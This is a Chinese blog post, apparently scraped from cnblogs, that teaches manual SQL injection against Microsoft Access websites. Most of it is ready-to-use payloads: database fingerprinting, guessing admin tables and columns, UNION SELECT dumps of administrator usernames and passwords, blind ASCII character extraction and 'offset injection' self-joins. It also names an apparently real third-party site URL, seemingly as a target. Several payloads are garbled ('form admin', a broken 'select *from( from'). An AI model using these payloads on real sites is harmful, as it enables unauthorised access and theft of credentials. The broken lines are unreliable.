zoukankan      html  css  js  c++  java
  • access手工注入

    1.判断数据类型

    and exists (select * from msysobjects) >0    

    and exists (select * from sysobjects) >0

     

    一般情况下,Microsoft Access的系统表是msysobjects,默认状态下用户没有访问权限,而Microsoft SQL Server的系统表是sysobjects,默认状态下用户是有访问权限的。
     
    若数据库是Microsoft SQL Server,且没有进行参数的过滤,则运行第一个语句后,显示的页面是正常的,第二条语句的结果是异常的;若数据库是Microsoft Access,那么两个链接得到的页面都是异常的。

    2.数据库表

    and exists (select * from admin)

    判断是否存在admin表

    3.猜用户、密码字段

    and exists (select password from admin)

    and exists (select admin from admin)

    网页正常即存在,一般密码会采用adminpass,passowrd等字段

    4.检测字段长度

    order by 20        依次测试

    网页正常即存在

    5.union select 暴管理用户、密码

    union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from admin
    因为有30个字段的长度,所以这样来暴管理和密码。

    返回3、5。
    我们再改下查询语句
    把用户和密码显示出来

    union select 1,2,username,4,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from admin
    OK,用户和密码出来了

    6.判断密码长度

    and (select len(admin) form admin)>6

    返回正常说明管理员账户的长度大于6

    and (select len(admin) form admin)=7

    返回正常说明管理员账户的长度等于7

    and (select len(passwd) form admin)>6

    and (select len(passwd) form admin)=7

    7.通过ascii码判断

    第1字符

    and (select top 1 asc(mid(admin,1,1)) from admin)>100

    返回正常说明大于,不正常说明不大于

    and (select top 1 asc(mid(admin,1,1)) from admin)>50

    返回正常说明大于

    and (select top 1 asc(mid(admin,1,1)) from admin)=97

    返回正常说明等于97对应的字母a

    第2字符

    and (select top 1 asc(mid(admin,2,1)) from admin)>100

    返回正常说明大于,不正常说明不大于

    第3字符

    and (select top 1 asc(mid(admin,3,1)) from admin)>100

    返回正常说明大于,不正常说明不大于

    and (select top 1 asc(mid(passwd,1,1)) from admin)>100

    返回正常说明大于,不正常说明不大于

    and (select top 1 asc(mid(passwd,2,1)) from admin)>100

    返回正常说明大于,不正常说明不大于

    and (select top 1 asc(mid(passwd,3,1)) from admin)>100

    返回正常说明大于,不正常说明不大于

    http://www.jnqtly.cn/cp11.asp?id=1129

    8.偏移注入

    偏移注入原理:
    1.Union合并查询需要列相等,顺序一样;
    2.select * from admin as a inner join admin as b on a.id=b.id 这句话 就是说把admin表记为a,同时也记为b,然后查询条件是a表的id列与b表的id列相等,返回所有相等的行,显然,a,b都是同一个表,当然全部返回啦。不理解的查一查语法吧。
    3. *代表了所有字段,如你查admin表,他有几个字段,那么*就代表几个字段
    举个例子:admin有5列,那么union select 1,2,3,* from admin如果返回正常,就代表注入的表有8列

    大致的语句如下
    and 1=2 union select * from (users as a inner join users as b on a.id=b.id )
    and 1=2 union select 1,* from (users as a inner join users as b on a.id=b.id )
    and 1=2 union select 1,2,* from (users as a inner join users as b on a.id=b.id )
    and 1=2 union select 1,2,3,* from (users as a inner join users as b on a.id=b.id )
    and 1=2 union select 1,2,3,*-1,* from (users as a inner join users as b on a.id=b.id )
    and 1=2 union select 1,a.id,* from (users as a inner join users as b on a.id=b.id )
    and 1=2 union select 1,a.id,b.id,* from (users as a inner join users as b on a.id=b.id )
    and 1=2 union select *from( from (users as a inner join users as b on a.id=b.id )
    and 1=2 union select * from ((select * from admin) as a inner join (select * from admin) as b on a.id=b.id) inner join (select id from admin) as c on c.id=a.id

  • 相关阅读:
    VC笔记
    安卓开发,调用系统相册或相机选择图片
    安卓gradle时报错"ERROR: Plugin with id 'com.android.application' not found."
    安卓开发 利用百度识图api进行物体识别(java版)
    安卓使用讯飞SDK
    《构建之法》读书笔记1
    安卓开发 利用百度识图api进行物体识别
    安卓使用讯飞sdk报错
    Android webview学习
    open failed: EACCES (Permission denied)
  • 原文地址:https://www.cnblogs.com/nightnine/p/5475623.html
Copyright © 2011-2022 走看看